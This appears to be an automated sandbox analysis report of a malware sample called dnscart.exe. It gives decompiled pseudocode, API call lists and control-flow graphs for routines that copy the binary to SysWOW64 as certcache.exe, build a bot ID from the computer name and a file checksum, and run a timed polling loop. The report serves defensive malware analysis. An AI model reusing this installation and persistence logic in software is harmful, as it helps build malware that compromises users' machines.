    • LoadLibraryW.KERNEL32(?), ref: 00229E04
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229E28
    • HeapFree.KERNEL32(00000000), ref: 00229E2F
    • LoadLibraryW.KERNEL32(?), ref: 00229E54
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229E78
    • HeapFree.KERNEL32(00000000), ref: 00229E7F
    • LoadLibraryW.KERNEL32(?), ref: 00229EA4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229EC8
    • HeapFree.KERNEL32(00000000), ref: 00229ECF
    • LoadLibraryW.KERNEL32(?), ref: 00229EF4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229F18
    • HeapFree.KERNEL32(00000000), ref: 00229F1F
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    C-Code - Quality: 15%
    			E002294C1(void* __ecx, signed short __edx, void* __eflags) {
    				void* _t17;
    				int _t20;
    				signed int _t27;
    				void* _t28;
    				void* _t30;
    				void* _t36;
    				signed short* _t38;
    				signed short _t39;
    				void* _t40;
    				void* _t41;
    				void* _t42;
    				void* _t43;
    				void* _t44;
    				void* _t45;
    				void* _t46;
    				void* _t48;
    
    				_t39 = __edx;
    				L00221830(__ecx, __edx);
    				_t41 =  *(_t45 - 4);
    				 *0x22c20c("C:\Windows\SysWOW64", 0x104, _t41, "C:\Windows\SysWOW64", "certcache");
    				HeapFree(GetProcessHeap(), 0, _t41);
    				_t42 =  *(_t45 - 8);
    				 *0x22c20c("C:\Windows\SysWOW64\certcache.exe", 0x104, _t42, "C:\Windows\SysWOW64", "certcache");
    				_t48 = _t46 + 0x30;
    				HeapFree(GetProcessHeap(), 0, _t42);
    				_t17 = CreateFileW("C:\Users\joeykelly\Desktop\dnscart.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
    				_t43 = _t17;
    				if(_t43 != 0xffffffff) {
    					goto 0x2319c0;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3"); // executed
    					_t28 = CreateFileMappingW(); // executed
    					_t40 = _t28;
    					if(_t40 != 0) {
    						goto 0x2319d9;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3"); // executed
    						_t30 = MapViewOfFile(); // executed
    						_t36 = _t30;
    						if(_t36 != 0) {
    							 *0x22cbd0 = RtlComputeCrc32(0, _t36, GetFileSize(_t43, 0));
    							UnmapViewOfFile(_t36);
    						}
    						CloseHandle(_t40);
    					}
    					CloseHandle(_t43);
    				}
    				 *(_t45 - 8) = 0x10;
    				_t20 = GetComputerNameW(_t45 - 0x28, _t45 - 8); // executed
    				if(_t20 != 0) {
    					_t38 = _t45 - 0x28;
    					if( *(_t45 - 0x28) != 0) {
    						goto 0x2319f0;
    						asm("int3");
    						do {
    							_t27 =  *_t38 & 0x0000ffff;
    							if(_t27 < 0x30 || _t27 > 0x39) {
    								if(_t27 < 0x61 || _t27 > 0x7a) {
    									if(_t27 < 0x41 || _t27 > 0x5a) {
    										 *_t38 = _t39;
    									}
    								}
    							}
    							_t38 =  &(_t38[1]);
    						} while ( *_t38 != 0);
    					}
    					_t44 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t44 == 0) {
    						_t44 =  *(_t45 - 8);
    					} else {
    						goto 0x231a04;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("scasb");
    						asm("int3");
    						E00221790(_t38, _t39);
    						_t48 = _t48 + 8;
    					}
    					 *0x22c1f8("216554_6C0D37D2", 0x104, _t44, _t45 - 0x28,  *0x22c3ac);
    					_t20 = HeapFree(GetProcessHeap(), 0, _t44);
    				}
    				goto 0x231a1e;
    				return _t20;
    			}




















    APIs
    • _snwprintf.NTDLL ref: 002294DE
    • GetProcessHeap.KERNEL32(00000000,?), ref: 002294EA
    • HeapFree.KERNEL32(00000000), ref: 002294F1
    • _snwprintf.NTDLL ref: 0022950F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0022951B
    • HeapFree.KERNEL32(00000000), ref: 00229522
    • CreateFileW.KERNEL32(C:\Users\user\Desktop\dnscart.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0022953C
    • GetComputerNameW.KERNEL32(?,?), ref: 002295B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00229601
    • RtlAllocateHeap.NTDLL(00000000), ref: 00229608
    • _snprintf.NTDLL ref: 00229642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 0022964E
    • HeapFree.KERNEL32(00000000), ref: 00229655
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    C-Code - Quality: 89%
    			E00228E20(void* __ebx, void* __edx, void* __edi) {
    				void* _v16;
    				void* _v24;
    				char _v28;
    				void* _v32;
    				char _v36;
    				intOrPtr _v44;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				char _v76;
    				void* _v84;
    				void* _v92;
    				signed int _t28;
    				long _t29;
    
    				_t28 = GetTickCount(); // executed
    				if(_t28 <  *0x22c278) {
    					L24:
    					return _t28;
    				} else {
    					_t29 =  *0x22c280; // 0x0
    					_t28 = _t29 - 1;
    					if(_t28 > 3) {
    						goto L24;
    					} else {
    						switch( *((intOrPtr*)(_t28 * 4 +  &M00229094))) {
    							case 0:
    								 *0x22c280 = 2;
    								return _t28;
    								goto L25;
    							case 1:
    								 *0x22c280 = 0; // executed
    								__eax = L00229670(); // executed
    								__eax = __eax;
    								if(__eax == 0) {
    									 *0x22c280 = 3;
    									_pop(__esi);
    									return __eax;
    								} else {
    									if(__eax != 0) {
    										goto L24;
    									} else {
    										__eax = SetEvent( *0x22c29c);
    										_pop(__esi);
    										return __eax;
    									}
    								}
    								goto L25;
    							case 2:
    								 *0x22c280 = 0;
    								 *0x22c294 = 0x221270;
    								 *0x22c298 = 0x221270;
    								__eax = L00222310();
    								__eax =  *0x22c02c; // 0x2212f8
    								 *0x22c26c = __eax;
    								__eax =  *0x22c030; // 0x6a
    								 *0x22c268 = 0x22c2a8;
    								 *0x22c270 = __eax;
    								 *0x22c280 = 4;
    								_pop(__esi);
    								return __eax;
    								goto L25;
    							case 3:
    								__ecx =  &_v28;
    								 *0x22c280 = 0;
    								__eax = L00228BF0( &_v28);
    								__ecx =  &_v36;
    								__eax = L00228D90(__eax,  &_v36);
    								__eax =  *0x22cbd0; // 0xf71b1512
    								_push("216554_6C0D37D2");
    								_v32 = __eax;
    								_v44 = 0x22c2a8;
    								_v44 =  *0x22c130();
    								__eax =  *0x22c2a4; // 0x1
    								_v52 = __eax;
    								do {
    									__ecx =  &_v24;
    									__esi = 0xdbba0;
    									__eax = L00228960(__edx, 0xdbba0);
    									__ecx =  &_v16;
    									__eax = L0022A7F0(__edx, 0xdbba0);
    									__edx =  &_v52;
    									__ecx =  &_v84;
    									if(L00229FD0(__ebx, __ecx, __edx) != 0) {
    										__eax =  &_v92;
    										_push( &_v92);
    										__eax =  &_v84;
    										_push(__eax);
    										__eax = L00228560(__eax, __ecx);
    										__esp = __esp + 8;
    										if(__eax == 0) {
    											__eax =  *0x22c298; // 0x0
    											__esi = 0x7530;
    											__eax = __eax + 8;
    											 *0x22c298 = __eax;
    											 *0x22c298 = __eax;
    										} else {
    											__eax = L002299F0(__eax, __ecx, __edi);
    											__ecx = 0;
    											__eax = E002288F0(0);
    											__ecx = 0;
    											__eax = E0022A7A0(0);
    											__edx =  &_v76;
    											__ecx =  &_v92;
    											if(L0022A1D0( &_v92, __edx) != 0) {
    												__eax = L00221750(__edi);
    												__edx = _v72;
    												if(__edx != 0) {
    													__ecx = _v76;
    													__eax = L00229AE0(__eax, _v76, __edx);
    												}
    												__eax = L00221750(__edi);
    												__edx = _v64;
    												if(__edx != 0) {
    													__ecx = _v68;
    													__eax = L002289D0(__edx, __esi);
    													__esi = 0;
    												}
    												__eax = L00221750(__edi);
    												__edx = _v56;
    												if(__edx != 0) {
    													__ecx = _v60;
    													__eax = L0022A860(__edx, __esi);
    													__esi = 0;
    												}
    											}
    											GetProcessHeap() = HeapFree(__eax, 0, _v92);
    										}
    										GetProcessHeap() = HeapFree(__eax, 0, _v84);
    									}
    									GetProcessHeap() = HeapFree(__eax, 0, _v24);
    									GetProcessHeap() = HeapFree(__eax, 0, _v16);
    								} while (__esi == 0);
    								__eax = GetTickCount();
    								__eax = __eax + __esi;
    								 *0x22c280 = 4;
    								 *0x22c278 = __eax;
    								GetProcessHeap() = HeapFree(__eax, 0, _v32);
    								goto L24;
    						}
    					}
    				}
    				L25:
    			}





















    APIs
    • GetTickCount.KERNEL32 ref: 00228E2A
    • SetEvent.KERNEL32 ref: 00228E84
    • lstrlen.KERNEL32 ref: 00228F26
    • HeapFree.KERNEL32(00000000), ref: 00229087
      • Part of subcall function 002288F0: WaitForSingleObject.KERNEL32(?,00000000), ref: 00228908
      • Part of subcall function 0022A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
      • Part of subcall function 0022A7A0: CloseHandle.KERNEL32(?), ref: 0022A7CC
      • Part of subcall function 0022A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
      • Part of subcall function 0022A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00228FF2
    • HeapFree.KERNEL32(00000000), ref: 00228FF9
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229028
    • HeapFree.KERNEL32(00000000), ref: 0022902F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0022903B
    • HeapFree.KERNEL32(00000000), ref: 00229042
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0022904E
    • HeapFree.KERNEL32(00000000), ref: 00229055
    • GetTickCount.KERNEL32 ref: 00229063
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229080
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 142 229370-2293a0 GetModuleFileNameW OpenSCManagerW 143 2293b0-2293d7 GetProcessHeap RtlAllocateHeap 142->143 144 2293a2-2293aa CloseServiceHandle 142->144 145 2293ef-229404 lstrlen 143->145 146 2293d9 143->146 144->143 146->145
    C-Code - Quality: 21%
    			E00229370(void* __ecx, void* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				long _v12;
    				short _v44;
    				intOrPtr _t23;
    				void* _t25;
    				void* _t26;
    				signed int _t29;
    				void* _t45;
    				int _t48;
    				signed int _t55;
    				void* _t56;
    				void* _t58;
    				void* _t66;
    				void* _t67;
    				void* _t69;
    				void* _t70;
    				signed int _t71;
    				short _t72;
    				void* _t74;
    				signed short* _t75;
    				void* _t77;
    				signed short _t80;
    				void* _t81;
    				void* _t82;
    				void* _t83;
    				void* _t84;
    				short* _t85;
    				void* _t86;
    				void* _t87;
    				void* _t88;
    				void* _t89;
    				void* _t92;
    				void* _t93;
    				void* _t94;
    				void* _t96;
    
    				_t84 = __esi;
    				_t81 = __edi;
    				_t77 = __edx;
    				_t70 = __ecx;
    				_t23 =  *0x22c27c; // 0x6c0d37d2
    				_t93 = _t92 - 0x28;
    				 *0x22c3ac = _t23;
    				GetModuleFileNameW(0, "C:\Users\joeykelly\Desktop\dnscart.exe", 0x104);
    				_t25 = OpenSCManagerW(0, 0, 6); // executed
    				if(_t25 != 0) {
    					 *0x22c2a4 =  *0x22c2a4 | 0x00000001;
    					CloseServiceHandle(_t25);
    				}
    				_t26 =  *0x22c3ac; // 0x6c0d37d2
    				_push(_t84);
    				_push(_t81);
    				_t85 = 0x22c3b0;
    				_v8 = _t26;
    				_t82 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
    				if(_t82 == 0) {
    					_t82 = _v12;
    				} else {
    					goto 0x23197c;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("scasb");
    					asm("int3");
    					E00221790(_t70, _t77);
    					_t93 = _t93 + 8;
    				}
    				_t29 =  *0x22c130(_t82, _t66);
    				_t71 = _t29;
    				_t67 = 2;
    				_v12 = _t71;
    				do {
    					_v8 =  !(_t29 / _t71);
    					_t29 = _t82 + _t29 % _t71;
    					if(_t29 <= _t82) {
    						L11:
    						if( *_t29 == 0x2c) {
    							goto L12;
    						}
    					} else {
    						while( *_t29 != 0x2c) {
    							_t29 = _t29 - 1;
    							if(_t29 > _t82) {
    								continue;
    							} else {
    								goto L11;
    							}
    							goto L13;
    						}
    						L12:
    						_t29 = _t29 + 1;
    					}
    					L13:
    					_t72 =  *_t29;
    					if(_t72 != 0) {
    						while(_t72 != 0x2c) {
    							_t29 = _t29 + 1;
    							 *_t85 = _t72;
    							_t85 = _t85 + 2;
    							_t72 =  *_t29;
    							if(_t72 != 0) {
    								continue;
    							}
    							goto L17;
    						}
    					}
    					L17:
    					_t71 = _v12;
    					_t67 = _t67 - 1;
    				} while (_t67 != 0);
    				HeapFree(GetProcessHeap(), 0, _t82);
    				 *_t85 = 0;
    				_push( &_v12);
    				_push(0x5f395cc9);
    				L00221830(0x221384, 0xc);
    				_t94 = _t93 + 8;
    				_push("C:\Windows\SysWOW64");
    				_push(0);
    				_push(0);
    				if(( *0x22c2a4 & 0x00000001) == 0) {
    					 *0x22c214(0, 0x1c);
    					_t80 = 0x14;
    					_t74 = 0x221530;
    				} else {
    					 *0x22c214(0, 0x29); // executed
    					_t80 = 4;
    					_t74 = 0x221380;
    				}
    				goto 0x2319a9;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				L00221830(_t74, _t80);
    				_t86 = _v8;
    				 *0x22c20c("C:\Windows\SysWOW64", 0x104, _t86, "C:\Windows\SysWOW64", "certcache");
    				HeapFree(GetProcessHeap(), 0, _t86);
    				_t87 = _v12;
    				 *0x22c20c("C:\Windows\SysWOW64\certcache.exe", 0x104, _t87, "C:\Windows\SysWOW64", "certcache");
    				_t96 = _t94 + 0x30;
    				HeapFree(GetProcessHeap(), 0, _t87);
    				_t45 = CreateFileW("C:\Users\joeykelly\Desktop\dnscart.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
    				_t88 = _t45;
    				if(_t88 != 0xffffffff) {
    					goto 0x2319c0;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3"); // executed
    					_t56 = CreateFileMappingW(); // executed
    					_t83 = _t56;
    					if(_t83 != 0) {
    						goto 0x2319d9;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3"); // executed
    						_t58 = MapViewOfFile(); // executed
    						_t69 = _t58;
    						if(_t69 != 0) {
    							 *0x22cbd0 = RtlComputeCrc32(0, _t69, GetFileSize(_t88, 0));
    							UnmapViewOfFile(_t69);
    						}
    						CloseHandle(_t83);
    					}
    					CloseHandle(_t88);
    				}
    				_v12 = 0x10;
    				_t48 = GetComputerNameW( &_v44,  &_v12); // executed
    				if(_t48 != 0) {
    					_t75 =  &_v44;
    					if(_v44 != 0) {
    						goto 0x2319f0;
    						asm("int3");
    						do {
    							_t55 =  *_t75 & 0x0000ffff;
    							if(_t55 < 0x30 || _t55 > 0x39) {
    								if(_t55 < 0x61 || _t55 > 0x7a) {
    									if(_t55 < 0x41 || _t55 > 0x5a) {
    										 *_t75 = _t80;
    									}
    								}
    							}
    							_t75 =  &(_t75[1]);
    						} while ( *_t75 != 0);
    					}
    					_t89 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t89 == 0) {
    						_t89 = _v12;
    					} else {
    						goto 0x231a04;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("scasb");
    						asm("int3");
    						E00221790(_t75, _t80);
    						_t96 = _t96 + 8;
    					}
    					 *0x22c1f8("216554_6C0D37D2", 0x104, _t89,  &_v44,  *0x22c3ac);
    					_t48 = HeapFree(GetProcessHeap(), 0, _t89);
    				}
    				goto 0x231a1e;
    				return _t48;
    			}







































    APIs
    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\dnscart.exe,00000104), ref: 0022938C
    • OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00229398
    • CloseServiceHandle.SECHOST(00000000), ref: 002293AA
    • GetProcessHeap.KERNEL32(00000008,0000015C), ref: 002293C6
    • RtlAllocateHeap.NTDLL(00000000), ref: 002293CD
    • lstrlen.KERNEL32(?), ref: 002293F4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 149 22967f-22968e lstrcmpiW 150 229690 149->150 151 229697-2296ee call 2218d0 memset * 2 SHFileOperationW 149->151 150->151 154 2296f9 151->154 155 2296f0-2296f3 151->155 156 22977b call 221970 154->156 155->154 155->156 158 229780-229787 156->158 159 229985 158->159 160 22978d 158->160 160->159
    APIs
    Strings
    • C:\Windows\SysWOW64\certcache.exe, xrefs: 002296DE
    • C:\Users\user\Desktop\dnscart.exe, xrefs: 002296D0
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 161 229705-229740 GetTempPathW GetTempFileNameW SHFileOperationW 162 229746-229749 161->162 163 2299e4-2299ef 161->163 162->163 165 22974f-22976c SHFileOperationW 162->165 165->163 166 229772-229775 165->166 166->163 167 22977b call 221970 166->167 169 229780-229787 167->169 170 229985 169->170 171 22978d 169->171 171->170
    APIs
    • GetTempPathW.KERNEL32 ref: 00229705
    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00229717
    • SHFileOperationW.SHELL32(?), ref: 00229738
    • SHFileOperationW.SHELL32(?), ref: 00229764
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    C-Code - Quality: 34%
    			E00229569(signed short __edx, void* __edi, void* __esi) {
    				void* _t8;
    				int _t13;
    				signed int _t20;
    				void* _t24;
    				signed short* _t26;
    				signed short _t27;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				void* _t31;
    				void* _t32;
    
    				_t29 = __esi;
    				_t28 = __edi;
    				_t27 = __edx;
    				_t8 = MapViewOfFile(??, ??, ??, ??, ??); // executed
    				_t24 = _t8;
    				if(_t24 != 0) {
    					 *0x22cbd0 = RtlComputeCrc32(0, _t24, GetFileSize(__esi, 0));
    					UnmapViewOfFile(_t24);
    				}
    				CloseHandle(_t28);
    				CloseHandle(_t29);
    				 *(_t31 - 8) = 0x10;
    				_t13 = GetComputerNameW(_t31 - 0x28, _t31 - 8); // executed
    				if(_t13 != 0) {
    					_t26 = _t31 - 0x28;
    					if( *(_t31 - 0x28) != 0) {
    						goto 0x2319f0;
    						asm("int3");
    						do {
    							_t20 =  *_t26 & 0x0000ffff;
    							if(_t20 < 0x30 || _t20 > 0x39) {
    								if(_t20 < 0x61 || _t20 > 0x7a) {
    									if(_t20 < 0x41 || _t20 > 0x5a) {
    										 *_t26 = _t27;
    									}
    								}
    							}
    							_t26 =  &(_t26[1]);
    						} while ( *_t26 != 0);
    					}
    					_t30 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t30 == 0) {
    						_t30 =  *(_t31 - 8);
    					} else {
    						goto 0x231a04;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("scasb");
    						asm("int3");
    						E00221790(_t26, _t27);
    						_t32 = _t32 + 8;
    					}
    					 *0x22c1f8("216554_6C0D37D2", 0x104, _t30, _t31 - 0x28,  *0x22c3ac);
    					_t13 = HeapFree(GetProcessHeap(), 0, _t30);
    				}
    				goto 0x231a1e;
    				return _t13;
    			}















    APIs
    • MapViewOfFile.KERNELBASE ref: 00229569
    • GetFileSize.KERNEL32(?,00000000), ref: 00229578
    • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00229582
    • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0022958E
    • CloseHandle.KERNEL32 ref: 00229595
    • CloseHandle.KERNEL32 ref: 0022959C
    • GetComputerNameW.KERNEL32(?,?), ref: 002295B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00229601
    • RtlAllocateHeap.NTDLL(00000000), ref: 00229608
    • _snprintf.NTDLL ref: 00229642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 0022964E
    • HeapFree.KERNEL32(00000000), ref: 00229655
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 225 221670-221688 CreateMutexW 226 221699-2216a4 GetLastError 225->226 227 22168a-221691 CloseHandle 225->227 229 2216a6-2216bb SetEvent CloseHandle * 2 call 229ca0 226->229 230 2216cb 226->230 227->226 232 2216c0-2216ca 229->232
    C-Code - Quality: 100%
    			E00221670(signed int __eax, void* __ebx, void* __esi) {
    				signed int _t38;
    
    				_t38 = __eax %  *(__esi + __ebx - 0x17);
    			}




    0x00221670

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 233 229409-229415 234 229417-22941a 233->234 235 229421-229424 233->235 236 229426 234->236 237 22941c-22941f 234->237 235->236 238 229427-22942b 235->238 236->238 237->234 237->235 239 229446-22944a 238->239 240 22942d 238->240 242 229404 239->242 243 22944c-22948c GetProcessHeap HeapFree call 221830 239->243 241 229430-229433 240->241 241->239 244 229435-229444 241->244 247 22948e-2294a2 SHGetFolderPathW 243->247 248 2294a4-2294b3 SHGetFolderPathW 243->248 244->239 244->241 249 2294b8 247->249 248->249
    APIs
    • GetProcessHeap.KERNEL32(00000000), ref: 0022944F
    • HeapFree.KERNEL32(00000000), ref: 00229456
    • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\SysWOW64), ref: 00229492
    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,C:\Windows\SysWOW64), ref: 002294A8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    C-Code - Quality: 43%
    			E0022198B() {
    				int _t10;
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				void* _t15;
    
    				asm("scasb");
    				asm("int3");
    				L00221830(_t11, _t12);
    				_t13 =  *(_t15 - 4);
    				 *0x22c20c(_t15 - 0x20c, 0x104, _t13, "C:\Windows\SysWOW64\certcache.exe", _t13);
    				HeapFree(GetProcessHeap(), 0, _t13);
    				_t10 = DeleteFileW(_t15 - 0x20c); // executed
    				return _t10;
    			}

    APIs
    • _snwprintf.NTDLL ref: 002219A8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 002219B4
    • HeapFree.KERNEL32(00000000), ref: 002219BB
    • DeleteFileW.KERNELBASE(?), ref: 002219C8
    Strings
    • C:\Windows\SysWOW64\certcache.exe, xrefs: 0022199C
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 253 21201b-212042 lstrcmp 255 212182-212196 253->255
    APIs
    • lstrcmp.KERNEL32(face,book), ref: 0021203A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240626114.0000000000210000.00000040.sdmp, Offset: 00210000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_210000_dnscart.jbxd
    C-Code - Quality: 58%
    			E00229F9D() {
    				void* _t5;
    				void* _t6;
    				void* _t7;
    
    				memset();
    				HeapFree(GetProcessHeap(), 0, _t7); // executed
    				L002215B0(_t5, _t6); // executed
    				ExitProcess(0);
    			}

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 52%
    			E00212663(intOrPtr _a4) {
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char _v40;
    				long _v44;
    				char _v76;
    				intOrPtr _v80;
    				DWORD* _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr* _v96;
    				void* _v100;
    				intOrPtr _v104;
    				intOrPtr* _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr* _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				int _v148;
    				intOrPtr _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				signed int _v164;
    				signed int _v168;
    				intOrPtr _v172;
    				int _v176;
    				intOrPtr _v180;
    				char _v184;
    				intOrPtr _t100;
    				intOrPtr _t107;
    				intOrPtr _t108;
    				int _t113;
    				int _t131;
    				void* _t135;
    				intOrPtr _t157;
    				intOrPtr _t159;
    				char* _t160;
    				intOrPtr _t161;
    				void* _t164;
    				intOrPtr _t183;
    				unsigned int _t186;
    				intOrPtr _t192;
    				void* _t206;
    				intOrPtr _t210;
    
    				_t100 = _a4;
    				_v44 = 0;
    				_t135 =  *((intOrPtr*)(_t100 + 0x3c));
    				_v184 = _t135;
    				_v180 = _t100;
    				_v80 = _t100;
    				_v84 =  &_v44;
    				_v88 =  *((intOrPtr*)(_t100 + 0x20));
    				_v92 =  *((intOrPtr*)(_t100 + 0x40));
    				_v96 = _t100 + 0x3c;
    				_v100 = _t135;
    				E002123F0(); // executed
    				E0021188A(_v100);
    				_t210 = _t206 - 8 + 8 - 4 + 4;
    				_t164 = _v100;
    				_t192 =  *((intOrPtr*)(_t164 + 0x3c));
    				_v104 = _t164 + _t192;
    				_v108 = _v100 + 0x3c;
    				_v112 = 0x18;
